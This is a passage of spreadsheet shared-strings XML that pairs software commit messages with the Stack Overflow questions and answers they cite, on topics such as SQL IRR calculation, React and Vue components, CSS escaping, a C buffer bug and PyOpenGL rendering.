    <t>There is a lot of difference in how Firefox and Chrome respond to css and js. [ff=Firefox, c=Chrome, sw= scrollWidth ]
Key points:
sw works only when the element's display is not inline and none.ff sets the display to block by default while c sets it to inline. So you would not get sw in c. If you need the element to be hidden anyways just use:visibility:hidden without setting the display for both ff and c.
If u have set the visibility in c, use style.width of the element instead of sc. This works.
If you still want to use sc on chrome also for a hidden span, you could use @AnthonyWJones answer on
https://stackoverflow.com/questions/1216759/knowing-how-wide-a-text-line-will-be-in-html-for-word-wrap-and-other-application
Worked for IE7,8,9 , FF, Chrome.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I found a sample function for calculating the equivalent of Excel IRR using sample test data but I keep getting this error:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Arithmetic overflow error converting numeric to data type numeric.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;which occurs on line 65 e.g.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SET @rate = @rate - @npv / (@new_npv - @npv);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-- Create the cash_flows table
CREATE TABLE cash_flows (
    id INT PRIMARY KEY,
    period INT,
    amount DECIMAL(18, 2)
);
-- Insert example data
INSERT INTO cash_flows (id, period, amount) VALUES
(1, 0, -10000),  -- Initial investment (negative cash flow)
(2, 1, 2000),    -- Cash flow at period 1
(3, 2, 3000),    -- Cash flow at period 2
(4, 3, 4000),    -- Cash flow at period 3
(5, 4, 5000);    -- Cash flow at period 4
-- Function to calculate NPV for a given rate
DROP FUNCTION IF EXISTS NPV
GO
CREATE FUNCTION dbo.NPV (@rate DECIMAL(18, 10))
RETURNS DECIMAL(18, 10)
AS
BEGIN
    DECLARE @npv DECIMAL(18, 10) = 0;
    SELECT @npv = SUM((amount / POWER(1 + @rate, period)))
    FROM cash_flows;
    RETURN @npv;
END;
-- Define variables for the IRR calculation
DECLARE @guess DECIMAL(18, 10) = 0.1;
DECLARE @precision DECIMAL(18, 10) = 0.00001;
DECLARE @max_iterations INT = 1000;
DECLARE @iteration INT = 0;
DECLARE @npv DECIMAL(18, 10);
DECLARE @new_npv DECIMAL(18, 10);
DECLARE @rate DECIMAL(18, 10) = @guess;
-- Calculate IRR using iterative approach
WHILE @iteration &amp;lt; @max_iterations
BEGIN
    SET @npv = dbo.NPV(@rate);
    IF ABS(@npv) &amp;lt; @precision
        BREAK;
    SET @new_npv = dbo.NPV(@rate + @precision);
    SET @rate = @rate - @npv / (@new_npv - @npv);
    SET @iteration = @iteration + 1;
END;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is supposed to create a sample table for cashflows for a loan and calculate the EIR based on the cashflows table. The loan is for 10000 and the expected cashflows per period are listed in the table.&lt;/p&gt;
&lt;p&gt;Please assist to identify what needs to be changed or cast to remove the error.
The expected output is an IRR rate value based on the computation.
First of all, I'm not entirely certain the query is correct but it runs. I got it from Microsoft copilot.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C276</t>
  </si>
  <si>
    <t>converted mptcpdest/tcpdest columns to categorical fields
(not tested much).
Also the loading/saving/reloading of csv files breaks the list
components see https://stackoverflow.com/questions/51075929/use-python-lists-as-a-dtype</t>
  </si>
  <si>
    <t>You can use ast.literal_eval
https://docs.python.org/3/library/ast.html#ast.literal_eval
ast.literal_eval(node_or_string)
Safely evaluate an expression node or a string containing a Python &gt;literal or container display. The string or node provided may only consist of &gt;the following Python literal structures: strings, bytes, numbers, tuples, &gt;lists, dicts, sets, booleans, and None.
This can be used for safely evaluating strings containing Python values &gt;from untrusted sources without the need to parse the values oneself. It is &gt;not capable of evaluating arbitrarily complex expressions, for example &gt;involving operators or indexing.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm creating an app that needs to be accessed by both a web front end hosted on an internal network and also run as a scheduled task. Nothing will need to be accessed outside of our internal systems and once the app is up and running we don't envision anything changing for some time.
My initial thought is to create a DLL encapsulating the bulk of the necessary functionality and then call it via both a Web Forms interface for manual execution, and a console app running as an automated (daily) scheduled task.
Another suggestion has been to expose a Web Service for the core functionality instead, but as the app will never need to be called by an external resource I think the extra effort required in implementing a Web Service might not be worth the hassle. The DLL solution should also be substantially faster(?).
My question is which route would you choose? Are there any pros/cons that I haven't covered? Any glaring omissions?
Disclaimer: I'm new to .Net but due to one of our developers being involved in a serious accident I've been asked to step up to the plate.
</t>
  </si>
  <si>
    <t>C277</t>
  </si>
  <si>
    <t>fixed failing ContentDetail and ContentList test
created a Seperate ContentDetailTest and ContentListTest component that doesn't use redux connect() https://stackoverflow.com/questions/47025477/how-to-test-react-router-params-with-redux-and-enzyme?noredirect=1#comment80998854_47025477</t>
  </si>
  <si>
    <t>Slawa's answer is what I ended up doing. It is not useful to test the functionality of React Router and Redux. Exporting the plain React component made the test much simpler.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I concatenate a new line in a calculated measure?&lt;/p&gt;
&lt;p&gt;So far, I have this: &lt;code&gt;Concatenate(&amp;quot;Overall Status&amp;quot;, '\n', &amp;quot;Activity State&amp;quot;)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;However, it returns the &lt;code&gt;\n&lt;/code&gt; as text: &lt;code&gt;Green\nCompleted&lt;/code&gt;. When in theory, I'm looking for:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Green
Completed
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C278</t>
  </si>
  <si>
    <t>Prefix element ids in EphemeralWeb.Component.ContactList
As UUIDs can have a digit as a leading character those would have to be
CSS-escaped. To avoid that ther is now an `id-` prefix as non-numeric
leading characters are fine.
See also: https://stackoverflow.com/questions/20306204/using-queryselector-with-ids-that-are-numbers</t>
  </si>
  <si>
    <t>It is valid, but requires some special handling.  From here: http://mathiasbynens.be/notes/css-escapes
Leading digits
If the first character of an identifier is numeric, you’ll need to escape it based on its Unicode code point. For example, the code point for the character 1 is U+0031, so you would escape it as \000031 or \31 .
Basically, to escape any numeric character, just prefix it with \3 and append a space character ( ). Yay Unicode!
So your code would end up as (CSS first, JS second):
#\31  {
    background: hotpink;
}
document.getElementById('1');
document.querySelector('#\\31 ');</t>
  </si>
  <si>
    <t xml:space="preserve">Here's a software design question I've encountered several times and have never found an ideal solution for (I'm also dealing with it now again.)
Many applications need some form of user/role management.  You have base users, groups that these users can belong to (not limited to just one), roles and permissions they have, organizational units, and a whole bunch of properties and other features that are project-specific.
My question is, what ways do people know of and/or have experience with to design and build a really dynamic, flexible user management system?  Are there any design patterns you know of that really help?
</t>
  </si>
  <si>
    <t>C279</t>
  </si>
  <si>
    <t>1 PubSub technically not necessary for this
Propagating from the parent LiveView to a component is as easy as using `send_update`. My problem now comes from wanting to trigger notifications from a background process. The only LiveViews in these instances are the page. The sidebar is a stateless component.
We could use live_session and on_mount to always mount a pubsub subscribe but what catches the events? Each damn page? I need to make Sidebar a LiveView and look into `:sticky` usage. This really fucking sucks honestly. I took enough of a detour just trying to nest the sidebar as a LiveComponent. This helped me greatly: https://stackoverflow.com/a/66325108</t>
  </si>
  <si>
    <t>I don't think you can based on this:
https://hexdocs.pm/phoenix_live_view/Phoenix.LiveComponent.html#module-managing-state
Components run inside the LiveView process, but may have their own state and event handling.
I believe both "child component" and parent share the same process.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this code that trying to generate a word document. I have the document working except the image adding. When I try to add a run, the image doesn't show up. When I try to add a picture to the document, it adds it to the end of the document, not in the body of the document. I am trying to debug by doing it for every paragraph. My template only has 3 paragraphs and a table as of right now. There are no errors showing in my console&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from docx import Document
from docx.shared import Inches, RGBColor
from docx2pdf import convert
from PIL import Image
import re
import os
from io import BytesIO
import requests
from docx.enum.text import WD_ALIGN_PARAGRAPH  # Import for alignment
def process_docx(docx_path, data, output_format):
    try:
        doc = Document(docx_path)
    except FileNotFoundError:
        print(f&amp;quot;Error: Could not find docx file at {docx_path}&amp;quot;)
        return None
    for table in doc.tables:
            for row in list(table.rows):  # Iterate over a copy to avoid issues while modifying
                if &amp;quot;{start.&amp;quot; in row.cells[0].text: # Check the first cell for the start tag
                    start_tag = row.cells[0].text
                    match = re.search(r&amp;quot;{start\.(\w+)}&amp;quot;, start_tag)
                    if match:
                        data_key = match.group(1)
                        if data_key in data['data'] and isinstance(data['data'][data_key], list):
                            # Store the template row content for later use.
                            template_row_cells = [cell.text for cell in row.cells]
                            # Remove the original row *before* processing items
                            table._element.remove(row._element)
                            for item in data['data'][data_key]:
                                new_row = table.add_row().cells
                                for i, cell_text in enumerate(template_row_cells):
                                    field_match = re.search(r&amp;quot;{&amp;quot; + data_key + &amp;quot;\.(\w+)}&amp;quot;, cell_text)
                                    if field_match:
                                        field_name = field_match.group(1)
                                        new_row[i].text = item.get(field_name, &amp;quot;&amp;quot;)
                                    else:
                                        new_row[i].text = cell_text  # Keep other text
                else: # process paragraph if no start tag in the first cell
                    for cell in row.cells:
                        for paragraph in cell.paragraphs:
                            process_paragraph(paragraph)
    for paragraph in doc.paragraphs:
        &amp;quot;&amp;quot;&amp;quot;try:
            img = Image.open(image_bytes)  # Will raise PIL.UnidentifiedImageError if not an image
            img.verify()  # Further check image integrity
        except Exception as e:
            raise Exception(f&amp;quot;Invalid image format or corrupted image from URL: {e}&amp;quot;)&amp;quot;&amp;quot;&amp;quot;
        run = paragraph.add_run()
        run.add_picture('Image.png')
        run.add_text('TESTING THIS')
        process_paragraph(paragraph)  
    doc.add_picture('Image.png', width=Inches(1), height=Inches(1))
    #...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The image(s) are not showing up in the body of the document. Let's say after paragraph 1, the image should show up in between paragraph 1 and 2, but it is not showing up.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C28</t>
  </si>
  <si>
    <t>Add simple toolbar component
...to demonstrate conditional rendering and projection using
props.children. Note: It's apparently not possible to restrict
the type of children to only certain React components:
https://stackoverflow.com/a/49408900</t>
  </si>
  <si>
    <t>Edit 2: Turns out that this approach prevent the warning, but according to the comments TabProps aren't properly checked.
You should try to set children of interface TabbedViewProps like so
interface TabbedViewProps { children?: React.ReactElement&lt;TabProps&gt;[] }
The idea here is not to tell your TabbedView has an array of Tab, but instead tell your TabbedView he has an array of element which takes specific props. In your case TabProps.
Edit ( thx to Matei ):
interface TabbedViewProps {
    children?: React.ReactElement&lt;TabProps&gt;[] | React.ReactElement&lt;TabProps&gt;
}</t>
  </si>
  <si>
    <t xml:space="preserve">Does anyone have links to documentation or guides on making the decision between REST vs. SOAP? I understand both of these but am looking for some references on the key decision points, eg, security, which may make you lean towards one or the other.
</t>
  </si>
  <si>
    <t>C280</t>
  </si>
  <si>
    <t>value is stale in the event handler because it gets its value from the closure where it was defined. Unless we re-subscribe a new event handler every time value changes, it will not get the new value.
Solution 1: Make the second argument to the publish effect [value]. This makes the event handler get the correct value, but also causes the effect to run again on every keystroke.
Solution 2: Use a ref to store the latest value in a component instance variable. Then, make an effect which does nothing but update this variable every time value state changes. In the event handler, use the ref, not value.
const [value, setValue] = useState(initialValue);
const refValue = useRef(value);
useEffect(() =&gt; {
    refValue.current = value;
});
const handleEvent = (msg, data) =&gt; {
    console.info("Value in event handler: ", refValue.current);
};
https://reactjs.org/docs/hooks-faq.html#what-can-i-do-if-my-effect-dependencies-change-too-often
Looks like there are some other solutions on that page which might work too. Much thanks to @Dinesh for the assistance.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm working on a large scale performance critical asp web application with a pretty much denormalized database (lots of data is duplicated across tables for performance reasons). The application is highly performance critical and large. There is almost no sense of any kind of n-tiered design. I can't touch the database, it's carved in stone.
Now I need to build some additional applications accessing the very same data in c# (.net 3.5). While doing so, I'm asked to build a new "core" which later can be used when moving on to MVC, so I guess it would be a good idea to introduce some kind of data-acess-layer holding the entity classes and a repository, which is responsible for the crud actions. 
I've been reading about the repository pattern and LinqToSql so I guess I know the very basics. The new applications that should be build are of course due 2 weeks ago, so I can't really take tons of time to create a huge framework or attend classes before I get to work. I'm willing to read a book a day but I need to get started quickly.
My question is, am I on the right path when thinking about LinqToSql and the repository pattern as a solution? Why not generate the entities using your favorite code generator and query the database old style using disconnected recordsets? Do I loose control over the sql queries when using LinqToSql? Should I worry about performance? Am I completely on the wrong way?
I hope I explained the issue at hand properly. If there are any open questions, feel free to ask.
</t>
  </si>
  <si>
    <t>C281</t>
  </si>
  <si>
    <t>save content data as an html iFrame instead of &lt;figure&gt; component
See:
 - https://ckeditor.com/docs/ckeditor5/latest/api/module_media-embed_mediaembed-MediaEmbedConfig.html#member-previewsInData
 - https://ckeditor.com/docs/ckeditor5/latest/builds/guides/integration/frameworks/react.html#component-properties
 - https://stackoverflow.com/a/65737633/5405197</t>
  </si>
  <si>
    <t>I had the same problem. I got oembed string from CKEDITOR. I solved this problem using this config:
editorConfig = {
    toolbar: [....],
    mediaEmbed: {
        previewsInData: true
    }
}
In this case CKEDITOR returns not oembed string but iframe. Just save it and show it as it is.
See
https://ckeditor.com/docs/ckeditor5/latest/features/media-embed.html#semantic-data-output-default</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just confused as to why this keeps giving me an error.&lt;/p&gt;
&lt;p&gt;If I just fread the file in and don't assign the last index to the null terminator, I can free the memory after using it. However, if I do assign the last index to the null terminator and try to free the data after using it, I get an error.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char *readFileToString(const char *file)
{
    char * buffer = 0;
    long length;
    FILE * f = fopen (file, &amp;quot;rb&amp;quot;);
    if(f == NULL) 
        printf(&amp;quot;ERROR::FILE:FILE_NOT_SUCCESFULLY_READ\n&amp;quot;);
    fseek (f, 0, SEEK_END);
    length = ftell (f);
    fseek (f, 0, SEEK_SET);
    buffer = malloc (length);
    if(buffer == NULL) printf(&amp;quot;Error alocating buffer memory&amp;quot;);
    fread (buffer, 1, length, f);
    fclose (f);
    buffer[length] = '\0'; // Offending line &amp;lt;------------------ code works if we don't do this
    return buffer;
}
int main()
{
    char *t = readFileToString(&amp;quot;test&amp;quot;);
    printf(&amp;quot;%s&amp;quot;, t);
    free(t); // ERROR IF WE CHANGE LAST BUFFER CHARACTER TO null terminator
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C282</t>
  </si>
  <si>
    <t>set public to mapService attribute in gis-search
For a given component all its members (methods, properties) accessed by its template must be public in the AOT compilation scenario.
https://stackoverflow.com/a/43177386/4385116</t>
  </si>
  <si>
    <t>For a given component all its members (methods, properties) accessed by its template must be public in the AOT compilation scenario. This is due to the fact that a template is turned into a TS class. A generated class and a component are 2 separate classes now and you can't access private members cross-class.
In short: you can't access private members in your templates if you want to use ahead-of-time compilation.
For better explaination
https://github.com/angular/angular/issues/11422</t>
  </si>
  <si>
    <t xml:space="preserve">Web parts seem to be used extensively in Sharepoint related development, but examples of using them in asp.net webforms applications are few and far between.  I'm implementing a domain specific portal framework and like the "widgetlike" functionality in iGoogle or pageflakes and would like to get that kind of feature in my application.  The real troubling issue from my perspective is that the drag &amp; drop layout features of web parts do not work in non-IE browsers unless you use the latest ASP.NET AJAX futures library.  It seems to me if Microsoft meant this to be a foundation technology, they would have moved these features into the main product by now.  
Are web parts a dead-end technology?  If so, are there any alternatives?
</t>
  </si>
  <si>
    <t>C283</t>
  </si>
  <si>
    <t>added this.scrollTop() to beforeUpdate() in Home.vue. This positions 
scrolls all the way to the top when the component changes routes. I tried using beforeRouteLeave but it didn't work because I'm using a sub-component(inside a route component). --&gt; 'https://stackoverflow.com/questions/42045433/vue-router-beforerouteleave-doesnt-stop-subcomponents</t>
  </si>
  <si>
    <t>As you are using a sub-component (inside the route component), you will not be able to use beforeRouteLeave directly.
Your sub-component is a child component of a route. Therefore you need to trigger the exit method of child component from your route component using Child Component Refs as explained in the guide page below:
https://v2.vuejs.org/v2/guide/components.html#Child-Component-Refs
You can create a reference to your sub-component as follows:
&lt;sub-component ref="mySubComponent"&gt;&lt;/sub-component&gt;
And now in your route component, you can do the following:
beforeRouteLeave: function(to, from, next) {
    // Indicate to the SubComponent that we are leaving the route
    this.$refs.mySubComponent.prepareToExit();
    // Make sure to always call the next function, otherwise the hook will never be resolved
    // Ref: https://router.vuejs.org/en/advanced/navigation-guards.html
    next();
}
Note: Your route component calls a method in the child sub-component called prepareToExit() in this example, in which you can do the clean-up as follows:
methods: {
    prepareToExit: function() {
        console.log("Preparing to exit sub component, stopping 'twoSecondsTimerEvents'")
        clearInterval(this.twoSecondsTimerEvents)
    }
}
Here is a working example: https://jsfiddle.net/mani04/crwuxez3/ (all the details logged in console)
Please note: This example uses Vue 2.1.10 and Vue-Router 2.2.0 (latest versions as of today). There were some issues in the previous versions, around Navigation Guards functions, which are now fully resolved.
EDIT: Alternate method
After posting the above solution, I realized that there is a simpler way to do it. Your sub-component may not get route specific callbacks like beforeRouteLeave, but it is still a Vue component that follows component lifecycle.
So, based on the component lifecycle diagram, you will have beforeDestroy callback in the sub component that you can use to clear the timer.
Here is how you can do it:
const SubComponent = Vue.component('sub-component', {
    template: `...`,
    data: function() {...},
    mounted: function() {...},
    // 'prepareToExit' method not required here
    // And also there is no need to handle 'beforeRouteLeave' in parent
    beforeDestroy: function() {
        console.log("Stopping the interval timer")
        clearInterval(this.twoSecondsTimerEvents)
    }
});
Advantages:
Much simpler than the earlier approach.
No need to handle any child component refs in parent component.
No need to trigger the cleanup method from parent component.
There are no disadvantages, but this trigger is not exactly tied to the route change, incase you wanted to do any other actions based on destination route. You may also use this if you like this better.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have tried to replicate something similar to &lt;a href="https://stackoverflow.com"&gt;https://www.falstad.com/ripple/&lt;/a&gt;, using PyGame, PyOpenGL and GLSL. I have checked that all the framebuffers, textures and shaders initialise properly as suggested online but now I don't know where else to look for the problem. The window opens, displays a black screen, and the collision detection appears to work, however it is useless if nothing gets displayed.&lt;/p&gt;
&lt;p&gt;Code Below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import pygame
from pygame.locals import *
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GL.shaders import compileShader
import item_draggable
from conversion import *
from gl_classes import *
from source import Source
from medium import Medium
import math
import numpy as np
class App:
    def __init__(self, title):
        self.running = True  # This is the main loop flag
        self.displaySurface = None  # This is the display surface for PyGame
        self.size = self.width, self.height = 1080, 1080  # This is the window size
        self.windowOffset = (
            40  # This is the offset of the window from the edge of the screen
        )
        self.caption = title  # This is the window title
        self.dragItems = []  # This is a list of all draggable items
        self.sources = []  # This is a list of all sources
        self.walls = []  # This is a list of all walls
        self.selected = (
            None  # This is the index of the item selected by the user using the mouse
        )
        self.offset = [
            0,
            0,
        ]  # This is the offset of the mouse from the top left corner of the selected item
        self.clock = pygame.time.Clock()  # This is the PyGame clock
        self.startTime = 0  # This is the time the simulation started (can change in order to prevent issues when items are added or moved)
        self.wavelength = 10  # This is the simulation wavelength
        self.waveTexture = None  # This is the OpenGL texture for the wave simulation
        self.damping = 1.0  # This is the damping factor for the simulation
        self.shaderProgramMain = None
        self.shaderProgramStatic = None
        self.shaderProgramProgressive = None
        self.shaderProgramDraw = None
        self.shaderProgramDrawLine = None
        self.vertexpPositionBuffer = None
        self.vertexTextureCoordBuffer = None
        self.sourceBuffer = None
        self.colorBuffer = None
        self.simVertexPositionBuffer = None
        self.simVertexTextureCoordBuffer = None
        self.simVertexDampingBuffer = None
        self.simPosition = []
        self.simDamping = []
        self.simTextureCoord = []
        self.progressive = False
        self.mvMatrix = np.matrix(np.identity(4), np.float32)
        self.pMatrix = np.matrix(np.identity(4), np.float32)
        self.mvMatrixStack = []
        self.renderTexture1 = None
        self.renderTexture2 = None
        self.colourScheme = [1, 1, 1, 1, 1, 1, 1, 1]
    def on_init(self):
        pygame.init()
        # Set up the display
        self.displaySurface = pygame.display.set_mode(
            self.size, pygame.DOUBLEBUF | pygame.OPENGL
        )
        # Set up the OpenGL context
        self.caption = pygame.display.set_caption(self.caption)
        gluPerspective(45, (self.width / self.height), 0.1, 50.0)
        glTranslatef(0.0, 0.0, -5)
        self.running = True
        # initialise shaders
        self.shaderProgramMain = self.create_shader(
            &amp;quot;shaders/display-fs.glsl&amp;quot;, &amp;quot;shaders/vs.glsl&amp;quot;
        )
        self.shaderProgramMain.brightnessUniform = glGetUniformLocation(
            self.shaderProgramMain.get_id(), &amp;quot;brightness&amp;quot;
        )
        self.shaderProgramMain.coloursUniform = glGetUniformLocation(
            self.shaderProgramMain.get_id(), &amp;quot;colours&amp;quot;
        )
        self.shaderProgramStatic = self.create_shader(
            &amp;quot;shaders/simulate-stat-fs.glsl&amp;quot;, &amp;quot;shaders/vs.glsl&amp;quot;
        )
        self.shaderProgramStatic.stepSizeXUniform = glGetUniformLocation(
            self.shaderProgramStatic.get_id(), &amp;quot;stepSizeX&amp;quot;
        )
        self.shaderProgramStatic.stepSizeYUniform = glGetUniformLocation(
            self.shaderProgramStatic.get_id(), &amp;quot;stepSizeY&amp;quot;
        )
        self.shaderProgramProgressive = self.create_shader(
            &amp;quot;shaders/simulate-prog-fs.glsl&amp;quot;, &amp;quot;shaders/vs.glsl&amp;quot;
        )
        self.shaderProgramProgressive.stepSizeXUniform = glGetUniformLocation(
            self.shaderProgramProgressive.get_id(), &amp;quot;stepSizeX&amp;quot;
        )
        self.shaderProgramProgressive.stepSizeYUniform = glGetUniformLocation(
            self.shaderProgramProgressive.get_id(), &amp;quot;stepSizeY&amp;quot;
        )
        self.shaderProgramDraw = self.create_shader(
            &amp;quot;shaders/draw-fs.glsl&amp;quot;, &amp;quot;shaders/draw-vs.glsl&amp;quot;
        )
        self.shaderProgramDrawLine = self.create_shader(
            &amp;quot;shaders/draw-line-fs.glsl&amp;quot;, &amp;quot;shaders/draw-vs.glsl&amp;quot;
        )
        # setup buffers
        self.vertexPositionBuffer = Buffer(glGenBuffers(1))
        glBindBuffer(GL_ARRAY_BUFFER, self.vertexPositionBuffer.id)
        glBufferData(
            GL_ARRAY_BUFFER,
            np.array([-1, +1, +1, +1, -1, -1, +1, -1], dtype=np.float32),
            GL_STATIC_DRAW,
        )
        self.vertexPositionBuffer.itemSize = 2
        self.vertexPositionBuffer.numItems = 4
        self.vertexTextureCoordBuffer = Buffer(glGenBuffers(1))
        glBindBuffer(GL_ARRAY_BUFFER, self.vertexTextureCoordBuffer.id)
        glBufferData(
            GL_ARRAY_BUFFER,
            np.array(
                [
                    self.windowOffset / self.width,
                    1 - self.windowOffset / self.height,
                    1 - self.windowOffset / self.width,
                    1 - self.windowOffset / self.height,
                    self.windowOffset / self.width,
                    self.windowOffset / self.height,
                    1 - self.windowOffset / self.width,
                    self.windowOffset / self.height,
                ],
                dtype=np.float32,
            ),
            GL_STATIC_DRAW,
        )
        self.vertexTextureCoordBuffer.itemSize = 2
        self.vertexTextureCoordBuffer.numItems = 4
        self.sourceBuffer = Buffer(glGenBuffers(1))
        glBindBuffer(GL_ARRAY_BUFFER, self.sourceBuffer.id)
        self.sourceBuffer.itemSize = 2
        self.sourceBuffer.numItems = 2
        self.colorBuffer = Buffer(glGenBuffers(1))
        glBindBuffer(GL_ARRAY_BUFFER, self.colorBuffer.id)
        self.colorBuffer.itemSize = 4
        self.colorBuffer.numItems = 2
        # visible area
        self.setPosRect(
            self.windowOffset,
            self.windowOffset,
            self.width - self.windowOffset,
            self.height - self.windowOffset,
        )
        # sides
        self.setPosRect(
            1,
            self.windowOffset,
            self.windowOffset,
            self.height - self.windowOffset,
        )
        self.setPosRect(
            self.width - self.windowOffset,
            self.windowOffset,
            self.width - 2,
            self.height - self.windowOffset,
        )
        self.setPosRect(
            self.windowOffset,
            1,
            self.width - self.windowOffset,
            self.windowOffset,
        )
        self.setPosRect(
            self.windowOffset,
            self.height - self.windowOffset,
            self.width - self.windowOffset,
            self.height - 2,
        )
        # corners
        self.setPosRect(1, 1, self.windowOffset, self.windowOffset)
        self.setPosRect(
            self.width - self.windowOffset, 1, self.width - 2, self.windowOffset
        )
        self.setPosRect(
            1, self.height - self.windowOffset, self.windowOffset, self.height - 2
        )
        self.setPosRect(
            self.width - self.windowOffset,
            self.height - self.windowOffset,
            self.width - 2,
            self.height - 2,
        )
        self.simVertexPositionBuffer = Buffer(glGenBuffers(1))
        glBindBuffer(GL_ARRAY_BUFFER, self.simVertexPositionBuffer.id)
        glBufferData(
            GL_ARRAY_BUFFER,
            np.array(self.simPosition, dtype=np.float32),
            GL_STATIC_DRAW,
        )
        self.simVertexPositionBuffer.itemSize = 2
        self.simVertexPositionBuffer.numItems = len(self.simPosition) / 2
        self.simVertexTextureCoordBuffer = Buffer(glGenBuffers(1))
        glBindBuffer(GL_ARRAY_BUFFER, self.simVertexTextureCoordBuffer.id)
        glBufferData(
            GL_ARRAY_BUFFER,
            np.array(self.simTextureCoord, dtype=np.float32),
            GL_STATIC_DRAW,
        )
        self.simVertexTextureCoordBuffer.itemSize = 2
        self.simVertexTextureCoordBuffer.numItems = len(self.simPosition) / 2
        self.simVertexDampingBuffer = Buffer(glGenBuffers(1))
        glBindBuffer(GL_ARRAY_BUFFER, self.simVertexDampingBuffer.id)
        glBufferData(
            GL_ARRAY_BUFFER, np.array(self.simDamping, dtype=np.float32), GL_STATIC_DRAW
        )
        self.simVertexDampingBuffer.itemSize = 1
        self.simVertexDampingBuffer.numItems = len(self.simDamping)
        # setup texture framebuffers
        self.renderTexture1 = self.initTextureFramebuffer()
        self.renderTexture2 = self.initTextureFramebuffer()
    def on_event(self, event):
        if event.type == pygame.QUIT:
            self.running = False
            # exit the program
        elif event.type == pygame.MOUSEBUTTONDOWN:
            if event.button == 1:
                # goes through dragItems and selects an item that collides with the mouse, if available
                for index, item in enumerate(self.dragItems):
                    if item.collidepoint(event.pos):
                        # selects item
                        self.selected = index
                        mouse_x, mouse_y = event.pos
                        self.offset[0] = item.x - mouse_x
                        self.offset[1] = item.y - mouse_y
        elif event.type == pygame.MOUSEBUTTONUP:
            # deselects item
            if event.button == 1:
                self.selected = None
        elif event.type == pygame.MOUSEMOTION:
            # moves selected item
            if (
                self.selected is not None
            ):  # selected can be `0` so `is not None` is required, which is more efficient than &amp;quot;!=&amp;quot;
                self.dragItems[self.selected][0] = event.pos[0] + self.offset[0]
                self.dragItems[self.selected][1] = event.pos[1] + self.offset[1]
    def on_loop(self):
        # update the simulation at a framerate of 144 fps
        self.clock.tick(144)
        # check if items are being changed
        # simulate
        rt = self.renderTexture1
        self.renderTexture1 = self.renderTexture2
        self.renderTexture2 = rt
        rttFramebuffer = self.renderTexture1.framebuffer
        glBindFramebuffer(GL_FRAMEBUFFER, rttFramebuffer.id)
        if self.progressive:
            prog = self.shaderProgramProgressive
        else:
            prog = self.shaderProgramStatic
        glUseProgram(prog.id)
        rttFramebuffer = self.renderTexture1.framebuffer
        glViewport(0, 0, rttFramebuffer.width, rttFramebuffer.height)
        glClearColor(0.0, 0.0, 0.0, 1.0)
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        glBindBuffer(GL_ARRAY_BUFFER, self.simVertexPositionBuffer.get_id())
        glVertexAttribPointer(
            prog.vertexPositionAttribute,
            self.simVertexPositionBuffer.itemSize,
            GL_FLOAT,
            False,
            0,
            0,
        )
        glBindBuffer(GL_ARRAY_BUFFER, self.simVertexTextureCoordBuffer.get_id())
        glVertexAttribPointer(
            prog.textureCoordAttribute,
            self.simVertexTextureCoordBuffer.itemSize,
            GL_FLOAT,
            False,
            0,
            0,
        )
        glEnableVertexAttribArray(prog.dampingAttribute)
        glEnableVertexAttribArray(prog.vertexPositionAttribute)
        glEnableVertexAttribArray(prog.textureCoordAttribute)
        glBindBuffer(GL_ARRAY_BUFFER, self.simVertexDampingBuffer.get_id())
        glVertexAttribPointer(
            prog.dampingAttribute,
            self.simVertexDampingBuffer.itemSize,
            GL_FLOAT,
            False,
            0,
            0,
        )
        glActiveTexture(GL_TEXTURE0)
        glBindTexture(GL_TEXTURE_2D, self.renderTexture2.get_id())
        glUniform1i(prog.samplerUniform, 0)
        glUniform1f(prog.stepSizeXUniform, 1 / self.width)
        glUniform1f(prog.stepSizeYUniform, 1 / self.height)
        self.setMatrixUniforms(prog)
        glDrawArrays(GL_TRIANGLES, 0, int(self.simVertexPositionBuffer.numItems))
        glDisableVertexAttribArray(prog.dampingAttribute)
        glDisableVertexAttribArray(prog.vertexPositionAttribute)
        glDisableVertexAttribArray(prog.textureCoordAttribute)
        srcCoords = []
        # draw sources
        for source in self.sources:
            self.prep_draw()
            f = (
                math.sin(self.clock.get_rawtime() * source.get_freq())
                * source.get_amp()
            )
            glUseProgram(self.shaderProgramDraw.get_id())
            glVertexAttrib4f(self.shaderProgramDraw.colourAttribute, f, 0, 1, 1)
            glBindBuffer(GL_ARRAY_BUFFER, self.sourceBuffer.get_id())
            srcCoords = list(derectify(source.get_pos(), self.size))
            srcCoords.append(srcCoords[0])
            srcCoords.append((srcCoords[1]) + 1)
            srcCoords = np.array(srcCoords, dtype=np.float32)
            glBufferData(GL_ARRAY_BUFFER, srcCoords, GL_STATIC_DRAW)
            glVertexAttribPointer(
                self.shaderProgramDraw.vertexPositionAttribute,
                self.sourceBuffer.itemSize,
                GL_FLOAT,
                False,
                0,
                0,
            )
            glEnableVertexAttribArray(self.shaderProgramDraw.vertexPositionAttribute)
            self.setMatrixUniforms(self.shaderProgramDraw)
            glDrawArrays(GL_LINES, 0, 4)
            glDisableVertexAttribArray(self.shaderProgramDraw.vertexPositionAttribute)
            # pygame
        # draw walls
        for wall in self.walls:
            self.prep_draw()
